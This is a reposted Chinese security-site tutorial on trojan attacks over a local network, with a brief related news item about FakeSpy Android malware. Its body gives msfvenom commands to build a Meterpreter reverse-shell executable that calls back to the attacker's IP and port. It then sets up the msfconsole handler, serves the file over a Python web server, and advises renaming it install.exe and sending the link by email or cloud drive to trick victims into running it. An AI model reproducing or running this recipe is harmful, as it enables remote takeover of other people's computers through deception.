1. 黑客安全网-互联网安全媒体信息综合平台首页
  2. 分类阅读
  3. 网络安全

基于局域网渗透攻击之木马攻击

使用kali生成木马文件,创建一个简易的web服务器,将木马文件伪装成install.exe类型的安装文件,诱使被攻击者点击木马文件,从而getshell

准备环境

攻击机(kali):192.168.29.130

被攻击机(window server 2008 SP2):192.168.29.135

1、攻击机(kali)使用msfvenom 生成 payloadmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.29.130 LPORT=4444 -f exe > /xx.exe基于局域网渗透攻击之木马攻击2.kali攻击机打开msfconsoleuse exploit/multi/handler      //使用攻击模块set payload windows/meterpreter/reverse_tcp    //设置攻击载荷,建立反弹连接set LHOST 192.168.29.130       //设置源IP(攻击机IP)set LPORT 4444            //设置源端口(攻击机未被占用端口)show options             //查看配置选项(选填,可查看未配置选项)基于局域网渗透攻击之木马攻击基于局域网渗透攻击之木马攻击3.实施攻击操作基于局域网渗透攻击之木马攻击4.kali攻击机将木马文件拷贝到指定目录基于局域网渗透攻击之木马攻击5.在该目录下面搭建一个简易的web服务器。命令:python -m SimpleHTTPServer 80基于局域网渗透攻击之木马攻击6.查看被攻击者的IP地址详情

基于局域网渗透攻击之木马攻击

7.被攻击者访问链接http://192.168.29.130/如下图,访问http://192.168.29.130/xx.exe即可直接下载木马文件(可以将URL放在邮件中发送给攻击者,或者放在网盘中添加指定内容诱使被攻击者点击,并且将exe文件名称修改为install.exe等类似安装文件进行伪装)基于局域网渗透攻击之木马攻击8.被攻击者将木马文件下载到本地基于局域网渗透攻击之木马攻击9.被攻击者双击木马文件后,攻击机kali得到一个会话,并且是最高administrator权限基于局域网渗透攻击之木马攻击原文链接

相关推荐: FakeSpy的Android恶意软件三年后“重现江湖” 比以前更危险

据外媒BGR报道,一款名为FakeSpy的Android恶意软件重现江湖,目前主要目标是美国和西欧的用户。该应用能够窃取用户的短信、银行信息和应用数据。该恶意软件通过一条看似来自当地邮局的短信进行传播,并指示用户下载一款伪装成合法邮局应用的应用 据Cybere…

本文为转载文章,源自互联网,由网络整理整理编辑,转载请注明出处:https://www.hacksafe.net/articles/network/3563.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注